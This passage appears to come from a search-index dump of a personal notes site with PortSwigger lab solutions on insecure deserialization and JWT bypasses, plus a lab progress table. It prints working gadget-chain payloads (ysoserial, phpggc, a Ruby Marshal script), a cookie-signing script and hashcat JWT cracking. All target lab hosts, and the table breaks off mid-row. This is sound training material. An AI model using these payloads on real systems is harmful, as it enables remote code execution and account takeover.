                            You can log in to your own account using the following credentials: wiener:peter

                            You can sometimes read source code by appending a tilde (~) to a filename to retrieve an editor-generated backup file.

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_3","title":"Solution","text":"

                            Review the code and notice CustomerTemplate.php

                            Read the file by adding a virgule and find an interesting method:

                            The cookie session consisted on a serialized object.

                            We will craft a seriealized object that triggers the interested method allocated in CustomTemplate.php and pass it base-64 encoded via the Inspector module:

                            O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}\n

                            Run the request!

                            # Burp solution\n1. Log in to your own account and notice the session cookie contains a serialized PHP object.\n2. From the site map, notice that the website references the file `/libs/CustomTemplate.php`. Right-click on the file and select \"Send to Repeater\".\n3. In Burp Repeater, notice that you can read the source code by appending a tilde (`~`) to the filename in the request line.\n4. In the source code, notice the `CustomTemplate` class contains the `__destruct()` magic method. This will invoke the `unlink()` method on the `lock_file_path` attribute, which will delete the file on this path.\n5. In Burp Decoder, use the correct syntax for serialized PHP data to create a `CustomTemplate` object with the `lock_file_path` attribute set to `/home/carlos/morale.txt`. Make sure to use the correct data type labels and length indicators. The final object should look like this:\n\n    `O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}`\n6. Base64 and URL-encode this object and save it to your clipboard.\n7. Send a request containing the session cookie to Burp Repeater.\n8. In Burp Repeater, replace the session cookie with the modified one in your clipboard.\n9. Send the request. The `__destruct()` magic method is automatically invoked and will delete Carlos's file.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-java-deserialization-with-apache-commons","title":"Exploiting Java deserialization with Apache Commons","text":"

                            PRACTITIONER Exploiting Java deserialization with Apache Commons

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_4","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and loads the Apache Commons Collections library. Although you don't have source code access, you can still exploit this lab using pre-built gadget chains.

                            To solve the lab, use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_4","title":"Solution","text":"

                            Install the following two plugins in Burpsuite: Java Deserialization Scanner and Java Serial Killer. With those, when browsing the site the Live audit will show us deserialization issues:

                            In the Burpsuite scanner see the issues already identified.

                            Paste the vulnerable request in Deserialization Scanner > Manual testing:

                            Click on All issues and you can identify a disclosed vulnerability on library Apache Commons Collections 4. This will help in the following steps.

                            Now we can craft a payload using ysoserial tool (see debugging and installation there).

                            As we have a java version 11, our payload will be:

                            java -jar ysoserial-all.jar CommonsCollections4 \"rm /home/carlos/morale.txt\" | base64 -w 0 > test.txt\n\n# -w 0 : it will remove the end of lines.\n

                            Now, we copy paste that value in the Cookie session, then we select it and with CTRL-u, we url-encode it (the key characters). Then we send the request.

                            # Burp solution\n\n1. Log in to your own account and observe that the session cookie contains a serialized Java object. Send a request containing your session cookie to Burp Repeater.\n2. Download the \"ysoserial\" tool and execute the following command. This generates a Base64-encoded serialized object containing your payload:\n\n    - In Java versions 16 and above:\n\n        `java -jar ysoserial-all.jar \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\ --add-opens=java.base/java.net=ALL-UNNAMED \\ --add-opens=java.base/java.util=ALL-UNNAMED \\ CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n    - In Java versions 15 and below:\n\n        `java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n3. In Burp Repeater, replace your session cookie with the malicious one you just created. Select the entire cookie and then URL-encode it.\n4. Send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-php-deserialization-with-a-pre-built-gadget-chain","title":"Exploiting PHP deserialization with a pre-built gadget chain","text":"

                            PRACTITIONER Exploiting PHP deserialization with a pre-built gadget chain

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_5","title":"Enunciation","text":"

                            This lab has a serialization-based session mechanism that uses a signed cookie. It also uses a common PHP framework. Although you don't have source code access, you can still exploit this lab's insecure deserialization using pre-built gadget chains.

                            To solve the lab, identify the target framework then use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, work out how to generate a valid signed cookie containing your malicious object. Finally, pass this into the website to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_5","title":"Solution","text":"

                            1. The cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.

                            2. Changing cookie to a fake value will expose the Sympfony 4.3.6 php library.

                            3. Also have a look at the secret_key revealed in the commented url.

                            4. phpgcc has a gadget chain for that library

                            5. Create your payload with:

                            ./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n

                            6. Construct a valid cookie containing this malicious object and sign it correctly using the secret key. Using this template:

                            <?php \n$object = \"OBJECT-GENERATED-BY-PHPGGC\"; \n$secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; \n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); \necho $cookie;\n

                            Generate a file lab.php customizing the script. Use the $secretKey obtained in step 3. Use the payload generated in step 5 for the $object.

                            ?php\n$object = \"Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRh>\n$secretKey = \"cvb2w284adozzw3m2wgbhmxn7ezi9s4v\";\n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}');\necho $cookie;\n

                            7. Add permissions and run it:

                            chmod +x lab.php\nphp lab.php\n

                            8. Place the generated cookie in the Coodie session in the Repeater and Send the request.

                            # Burp solution\n1. Log in and send a request containing your session cookie to Burp Repeater. Highlight the cookie and look at the **Inspector** panel.\n2. Notice that the cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.\n3. Copy the decoded cookie from the **Inspector** and paste it into Decoder.\n4. In Decoder, highlight the token and then select **Decode as > Base64**. Notice that the token is actually a serialized PHP object.\n5. In Burp Repeater, observe that if you try sending a request with a modified cookie, an exception is raised because the digital signature no longer matches. However, you should notice that:\n    - A developer comment discloses the location of a debug file at `/cgi-bin/phpinfo.php`.\n    - The error message reveals that the website is using the Symfony 4.3.6 framework.\n6. Request the `/cgi-bin/phpinfo.php` file in Burp Repeater and observe that it leaks some key information about the website, including the `SECRET_KEY` environment variable. Save this key; you'll need it to sign your exploit later.\n7. Download the \"PHPGGC\" tool and execute the following command:\n\n    `./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64`\n\n    This will generate a Base64-encoded serialized object that exploits an RCE gadget chain in Symfony to delete Carlos's `morale.txt` file.\n\n8. You now need to construct a valid cookie containing this malicious object and sign it correctly using the secret key you obtained earlier. You can use the following PHP script to do this. Before running the script, you just need to make the following changes:\n\n    - Assign the object you generated in PHPGGC to the `$object` variable.\n    - Assign the secret key that you copied from the `phpinfo.php` file to the `$secretKey` variable.\n\n    `<?php $object = \"OBJECT-GENERATED-BY-PHPGGC\"; $secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; $cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); echo $cookie;`\n\n    This will output a valid, signed cookie to the console.\n\n9. In Burp Repeater, replace your session cookie with the malicious one you just created, then send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-ruby-deserialization-using-a-documented-gadget-chain","title":"Exploiting Ruby deserialization using a documented gadget chain","text":"

                            PRACTITIONER Exploiting Ruby deserialization using a documented gadget chain

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_6","title":"Enunciation","text":"

                            This lab uses a serialization-based session mechanism and the Ruby on Rails framework. There are documented exploits that enable remote code execution via a gadget chain in this framework.

                            To solve the lab, find a documented exploit and adapt it to create a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_6","title":"Solution","text":"

                            1. Provoke an error message to disclose the library performing deserialization in the cookie session:

                            2. Find a documented vulnerability for that library at https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

                            3. Copy the original script:

                            # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"id\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs payload.inspect\nputs Marshal.load(payload)\n

                            4. And modify it:

                            # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"rm /home/carlos/morale.txt\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs Base64.encode64(payload)\n

                            Changes made:

                            • Last two lines to puts Base64.encode64(payload)
                            • User line rs.instance_variable_set('@git_set', \"id\") to inject the payload rs.instance_variable_set('@git_set', \"rm /home/carlos/morale.txt\").

                            5. Run it. You can use https://onecompiler.com/ruby/

                            6. Paste the generated payload into the session cookie in the repeater and have sent the request.

                            # Burp solution\n1. Log in to your own account and notice that the session cookie contains a serialized (\"marshaled\") Ruby object. Send a request containing this session cookie to Burp Repeater.\n2. Browse the web to find the `Universal Deserialisation Gadget for Ruby 2.x-3.x` by `vakzz` on `devcraft.io`. Copy the final script for generating the payload.\n3. Modify the script as follows:\n    - Change the command that should be executed from `id` to `rm /home/carlos/morale.txt`.\n    - Replace the final two lines with `puts Base64.encode64(payload)`. This ensures that the payload is output in the correct format for you to use for the lab.\n4. Run the script and copy the resulting Base64-encoded object.\n5. In Burp Repeater, replace your session cookie with the malicious one that you just created, then URL encode it.\n6. Send the request to solve the lab.\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_7","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_7","title":"Solution","text":"
                            # Burp solution\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_1","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_8","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_8","title":"Solution","text":"
                            # Burp solution\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#j_2","title":"J","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_9","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_9","title":"Solution","text":"
                            # Burp solution\n
                            ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-jwt/","title":"BurpSuite Labs - Json Web Token jwt","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-unverified-signature","title":"JWT authentication bypass via unverified signature","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn't verify the signature of any JWTs that it receives.

                            To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-flawed-signature-verification","title":"JWT authentication bypass via flawed signature verification","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_1","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.

                            To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_1","title":"Solution","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-weak-signing-key","title":"JWT authentication bypass via weak signing key","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_2","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.

                            To solve the lab, first brute-force the website's secret key. Once you've obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_2","title":"Solution","text":"

                            Capture the JWT of wiener user and run hashcat with a well-known dictionary of jwt secrets such as https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

                            hashcat -a 0 -m 16500 capturedJWT <wordlist>\n

                            Results:

                            eyJraWQiOiI2YTNmZjdmMi0xMDNmLTQyZGEtYmNkZC0yN2JiZmM4ZTU3OTQiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxNDYwMTIyNSwic3ViIjoid2llbmVyIn0.AeWLmJpWTsA-c-dA5j6UHIQ-f9Mo6F9Y-OrXBsGu6Gw:secret1\n

                            Open JWT Editor, go to Keys tab and generate a new signature.

                            Send your request to repeater, go to JSON Web Token tab, modify username to administrator, click on Sign and select your signature. Modify endpoint to /admin and send request.

                            Trigger the delete user carlos endpoint:

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jwk-header-injection","title":"JWT authentication bypass via jwk header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_3","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. The server supports the jwk parameter in the JWT header. This is sometimes used to embed the correct verification key directly in the token. However, it fails to check whether the provided key came from a trusted source.

                            To solve the lab, modify and sign a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_3","title":"Solution","text":"

                            Capture wiener JWT and send the request GET /admin to the Repeater module. Once there, go to JSON Web Token tab and:

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#jwt-authentication-bypass-via-jku-header-injection","title":"JWT authentication bypass via jku header injection","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_4","title":"Enunciation","text":"

                            This lab uses a JWT-based mechanism for handling sessions. The server supports the jku parameter in the JWT header. However, it fails to check whether the provided URL belongs to a trusted domain before fetching the key.

                            To solve the lab, forge a JWT that gives you access to the admin panel at /admin, then delete the user carlos.

                            You can log in to your own account using the following credentials: wiener:peter

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_4","title":"Solution","text":"
                            ##### Part 1 - Upload a malicious JWK Set\n\n1. In Burp, load the JWT Editor extension from the BApp store.\n\n2. In the lab, log in to your own account and send the post-login `GET /my-account` request to Burp Repeater.\n\n3. In Burp Repeater, change the path to `/admin` and send the request. Observe that the admin panel is only accessible when logged in as the `administrator` user.\n\n4. Go to the **JWT Editor Keys** tab in Burp's main tab bar.\n\n5. Click **New RSA Key**.\n\n6. In the dialog, click **Generate** to automatically generate a new key pair, then click **OK** to save the key. Note that you don't need to select a key size as this will automatically be updated later.\n\n7. In the browser, go to the exploit server.\n\n8. Replace the contents of the **Body** section with an empty JWK Set as follows:\n\n    `{ \"keys\": [ ] }`\n9. Back on the **JWT Editor Keys** tab, right-click on the entry for the key that you just generated, then select **Copy Public Key as JWK**.\n\n10. Paste the JWK into the `keys` array on the exploit server, then store the exploit. The result should look something like this:\n\n    `{ \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"893d8f0b-061f-42c2-a4aa-5056e12b8ae7\", \"n\": \"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw\" } ] }`\n\n##### Part 2 - Modify and sign the JWT\n\n1. Go back to the `GET /admin` request in Burp Repeater and switch to the extension-generated **JSON Web Token** message editor tab.\n\n2. In the header of the JWT, replace the current value of the `kid` parameter with the `kid` of the JWK that you uploaded to the exploit server.\n\n3. Add a new `jku` parameter to the header of the JWT. Set its value to the URL of your JWK Set on the exploit server.\n\n4. In the payload, change the value of the `sub` claim to `administrator`.\n\n5. At the bottom of the tab, click **Sign**, then select the RSA key that you generated in the previous section.\n\n6. Make sure that the **Don't modify header** option is selected, then click **OK**. The modified token is now signed with the correct signature.\n\n7. Send the request. Observe that you have successfully accessed the admin panel.\n\n8. In the response, find the URL for deleting `carlos` (`/admin/delete?username=carlos`). Send the request to this endpoint to solve the lab.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_5","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_5","title":"Solution","text":"

                            I

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_1","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_6","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_6","title":"Solution","text":"

                            I

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#b_2","title":"B","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#enunciation_7","title":"Enunciation","text":"

                            T

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-jwt/#solution_7","title":"Solution","text":"

                            I

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-labs/","title":"BurpSuite Labs","text":"","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#sql-injection","title":"SQL injection","text":"Solution SQL injection level link Solved sqli-1 SQL injection Apprentice SQL injection vulnerability in WHERE clause allowing retrieval of hidden data Solved sqli-2 SQL injection Apprentice SQL injection vulnerability allowing login bypass Solved sqli-3 SQL injection Practitioner SQL injection UNION attack, determining the number of columns returned by the query Solved sqli-4 SQL injection Practitioner SQL injection UNION attack, finding a column containing text Solved sqli-5 SQL injection Practitioner SQL injection UNION attack, retrieving data from other tables Solved sqli-6 SQL injection Practitioner SQL injection UNION attack, retrieving multiple values in a single column Solved SQL injection Practitioner SQL injection attack, querying the database type and version on Oracle Not solved SQL injection Practitioner SQL injection attack, querying the database type and version on MySQL and Microsoft Not solved SQL injection Practitioner SQL injection attack, listing the database contents on non-Oracle databases Not solved SQL injection Practitioner SQL injection attack, listing the database contents on Oracle Not solved SQL injection Practitioner Blind SQL injection with conditional responses Not solved SQL injection Practitioner Blind SQL injection with conditional errors Not solved SQL injection Practitioner Blind SQL injection with time delays Not solved SQL injection Practitioner Blind SQL injection with time delays and information retrieval Not solved SQL injection Practitioner Blind SQL injection with out-of-band interaction Not solved SQL injection Practitioner Blind SQL injection with out-of-band data exfiltration Not solved SQL injection Practitioner SQL injection with filter bypass via XML encoding Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-scripting","title":"Cross-site scripting","text":"Solution level link Solved Solution xss-1 Cross-site scripting Apprentice Reflected XSS into HTML context with nothing encoded Solved xss-2 Cross-site scripting Apprentice Stored XSS into HTML context with nothing encoded Solved xss-3 Cross-site scripting Apprentice DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search Solved xss-4 Cross-site scripting Apprentice DOM XSS in\u00a0innerHTML\u00a0sink using source\u00a0location.search Solved xss-5 Cross-site scripting Apprentice DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source Solved xss-6 Cross-site scripting Apprentice DOM XSS in jQuery selector sink using a hashchange event Solved Cross-site scripting Apprentice Reflected XSS into attribute with angle brackets HTML-encoded Not solved Cross-site scripting Apprentice Stored XSS into anchor\u00a0href\u00a0attribute with double quotes HTML-encoded Not solved Cross-site scripting Apprentice Reflected XSS into a JavaScript string with angle brackets HTML encoded Not solved Cross-site scripting (burpsuite-xss.md) Practitioner DOM XSS in\u00a0document.write\u00a0sink using source\u00a0location.search\u00a0inside a select element Not solved Cross-site scripting Practitioner DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded Not solved Cross-site scripting Practitioner Reflected DOM XSS Not solved Cross-site scripting Practitioner Stored DOM XSS Not solved Cross-site scripting Practitioner Exploiting cross-site scripting to steal cookies Not solved Cross-site scripting Practitioner Exploiting cross-site scripting to capture passwords Not solved Cross-site scripting Practitioner Exploiting XSS to perform CSRF Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with most tags and attributes blocked Not solved Cross-site scripting Practitioner Reflected XSS into HTML context with all tags blocked except custom ones Not solved Cross-site scripting Practitioner Reflected XSS with some SVG markup allowed Not solved Cross-site scripting Practitioner Reflected XSS in canonical link tag Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with single quote and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped Not solved Cross-site scripting Practitioner Stored XSS into\u00a0onclick\u00a0event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped Not solved Cross-site scripting Practitioner Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped Not solved Cross-site scripting Expert Reflected XSS with event handlers and\u00a0href\u00a0attributes blocked Not solved Cross-site scripting Expert Reflected XSS in a JavaScript URL with some characters blocked Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape without strings Not solved Cross-site scripting Expert Reflected XSS with AngularJS sandbox escape and CSP Not solved Cross-site scripting Expert Reflected XSS protected by very strict CSP, with dangling markup attack Not solved Cross-site scripting Expert Reflected XSS protected by CSP, with CSP bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-site-request-forgery","title":"Cross-Site Request Forgery","text":"Cross-site Request Forgery level link Solved Cross-site Request Forgery Apprentice CSRF vulnerability with no defenses Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on request method Not solved Cross-site Request Forgery Practitioner CSRF where token validation depends on token being present Not solved Cross-site Request Forgery Practitioner CSRF where token is not tied to user session Not solved Cross-site Request Forgery Practitioner CSRF where token is tied to non-session cookie Not solved Cross-site Request Forgery Practitioner CSRF where token is duplicated in cookie Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via method override Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via client-side redirect Not solved Cross-site Request Forgery Practitioner SameSite Strict bypass via sibling domain Not solved Cross-site Request Forgery Practitioner SameSite Lax bypass via cookie refresh Not solved Cross-site Request Forgery Practitioner CSRF where Referer validation depends on header being present Not solved Cross-site Request Forgery Practitioner CSRF with broken Referer validation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#clickjacking","title":"Clickjacking","text":"Clikjacking level link Solved Clikjacking Apprentice Basic clickjacking with CSRF token protection Not solved Clikjacking Apprentice Clickjacking with form input data prefilled from a URL parameter Not solved Clikjacking Apprentice Clickjacking with a frame buster script Not solved Clikjacking Practitioner Exploiting clickjacking vulnerability to trigger DOM-based XSS Not solved Clikjacking Practitioner Multistep clickjacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#dom-based-vulnerabilities","title":"DOM-based vulnerabilities","text":"DOM-based vulnerabilities level link Solved DOM-based vulnerabilities Practitioner DOM XSS using web messages Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and a JavaScript URL Not solved DOM-based vulnerabilities Practitioner DOM XSS using web messages and\u00a0JSON.parse Not solved DOM-based vulnerabilities Practitioner DOM-based open redirection Not solved DOM-based vulnerabilities Practitioner DOM-based cookie manipulation Not solved DOM-based vulnerabilities Expert Exploiting DOM clobbering to enable XSS Not solved DOM-based vulnerabilities Expert Clobbering DOM attributes to bypass HTML filters Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#cross-origin-resource-sharing","title":"Cross-origin resource sharing","text":"Cross-origin resource sharing level link Solved Cross-origin resource sharing Apprentice CORS vulnerability with basic origin reflection Not solved Cross-origin resource sharing Apprentice CORS vulnerability with trusted null origin Not solved Cross-origin resource sharing Practitioner CORS vulnerability with trusted insecure protocols Not solved Cross-origin resource sharing Expert CORS vulnerability with internal network pivot attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#xml-external-entity","title":"XML external entity","text":"XML external entity level link Solved xxe-1 Apprentice Exploiting XXE using external entities to retrieve files Solved xxe-2 Apprentice Exploiting XXE to perform SSRF attacks Solved xxe-3 Practitioner Blind XXE with out-of-band interaction Solved xxe-4 Practitioner Blind XXE with out-of-band interaction via XML parameter entities Solved xxe-5 Practitioner Exploiting blind XXE to exfiltrate data using a malicious external DTD Solved xxe-6 Practitioner Exploiting blind XXE to retrieve data via error messages Solved xxe-7 Practitioner Exploiting XInclude to retrieve files Solved xxe-8 Practitioner Exploiting XXE via image file upload Solved xxe-9 Expert Exploiting XXE to retrieve data by repurposing a local DTD Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-request-forgery","title":"Server-side request forgery","text":"Server-side request forgery level link Solved ssrf-1 Server-side request forgery Apprentice Basic SSRF against the local server Solved ssrf-2 Server-side request forgery Apprentice Basic SSRF against another back-end system Solved ssrf-3 Server-side request forgery Practitioner SSRF with blacklist-based input filter Solved ssrf-4 Server-side request forgery Practitioner SSRF with filter bypass via open redirection vulnerability Not solved Server-side request forgery Practitioner Blind SSRF with out-of-band detection Not solved Server-side request forgery Expert SSRF with whitelist-based input filter Not solved Server-side request forgery Expert Blind SSRF with Shellshock exploitation Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-request-smuggling","title":"HTTP request smuggling","text":"HTTP request smuggling level link Solved HTTP request smuggling Practitioner HTTP request smuggling, basic CL.TE vulnerability Not solved HTTP request smuggling Practitioner HTTP request smuggling, basic TE.CL vulnerability Not solved HTTP request smuggling Practitioner HTTP request smuggling, obfuscating the TE header Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a CL.TE vulnerability via differential responses Not solved HTTP request smuggling Practitioner HTTP request smuggling, confirming a TE.CL vulnerability via differential responses Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability Not solved HTTP request smuggling Practitioner Exploiting HTTP request smuggling to reveal front-end request rewriting Not solved HTTP request smuggling Practitioner Exploiting HTTP request 